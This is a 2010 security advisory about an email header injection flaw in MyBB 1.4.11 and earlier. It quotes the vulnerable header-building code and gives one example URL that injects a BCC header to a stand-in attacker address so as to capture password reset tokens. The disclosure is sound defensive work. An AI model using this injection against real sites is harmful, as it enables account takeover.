SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: MyBB Password Reset Email BCC: Injection Vulnerability Release Date: 2010/04/13 Last Modified: 2010/04/13 Author: Stefan Esser [stefan.esser[at]sektioneins.de] Application: MyBB <= 1.4.11 Severity: An email injection vulnerability in MyBB allows injecting e.g. BCC mail headers into password reset emails. This allows an attacker to takeover accounts via the password reset functionality. Risk: Critical Vendor Status: MyBB 1.4.12 was released which fixes this vulnerability Reference: http://www.sektioneins.com/en/advisories/advisory-012010-mybb-password-reset-email-bcc-injection-vulnerability/ Overview: Quote from http://www.mybboard.net "MyBB is a discussion board that has been around for a while; it has evolved from other bulletin boards into the forum package it is today. Therefore, it is a professional and efficient discussion board, developed by an active team of developers. The MyBB history has been recorded and is available for the interested to read. You can also read more about the MyBB team and why they develop MyBB in their spare time. We also like to highlight the most active and contributing fansites of the MyBB community." During evaluation of various password reset implementations it was discovered that MyBB contains an email injection vulnerability that allows arbitrary account takeover by injecting BCC: email headers through a simple URL manipulation. When triggering the password reset functionality via such a manipulated URL MyBB will send a copy of the secret password reset email to wherever the injected BCC: header points to. Details: Inside the set_common_header() method of the MailHandler class the following code is responsible for adding several common headers to all outgoing emails. This includes all password reset emails. $this->headers .= "Message-ID: <{$msg_id}>{$this->delimiter}"; $this->headers .= "Content-Transfer-Encoding: 8bit{$this->delimiter}"; $this->headers .= "X-Priority: 3{$this->delimiter}"; $this->headers .= "X-MSMail-Priority: Normal{$this->delimiter}"; $this->headers .= "X-Mailer: MyBB{$this->delimiter}"; if(defined("IN_ADMINCP")) { ... } $this->headers .= "X-MyBB-Script: {$http_host}{$_SERVER['PHP_SELF']}{$this->delimiter}"; $this->headers .= "MIME-Version: 1.0{$this->delimiter}"; The code above adds a "X-MyBB-Script" header to all outgoing emails, which contains the content of the $_SERVER['PHP_SELF'] variable. The problem here is that PHP_SELF does not only contain the path relative to the document root directory, but also extensions like the Apache PATH_INFO. Therefore it is controllable by malicious users. By calling a MyBB PHP script like http://example.com/MyBB/index.php/%0aBCC:attacker@example.com%0ax: it is possible to add arbitrary BCC headers to all emails sent by this script. If the same attack is used against the password reset functionality an attacker is able to grab a copy of the secret password reset token and the randomly generated password, which results in an account takeover. This vulnerability was fixed by the vendor by removing the code that adds the X-MyBB-Script header to the email. Furthermore it should be noted that users of the Suhosin Extension version 0.9.30 or newer are safe from this class of attacks because several unsafe characters like < > " ' \r and \n are automatically replaced by a ? character within PHP_SELF. Proof of Concept: SektionEins GmbH is not going to release a proof of concept exploit for this vulnerability. Disclosure Timeline: 31. March 2010 - Notified the MyBB devs via security contact form 13. April 2010 - MyBB developers released MyBB 1.4.12 13. April 2010 - Public Disclosure Recommendation: It is recommended to upgrade to the latest version of MyBB. Grab your copy at: http://mybboard.net/downloads CVE Information: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a name to this vulnerability. Month of PHP Security: If you have a non-public vulnerability like this one, then don't hesitate to submit it to the Month of PHP Security. Further information at http://php-security.org GPG-Key: pub 1024D/15ABDA78 2004-10-17 Stefan Esser Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78 Copyright 2010 SektionEins GmbH. All rights reserved.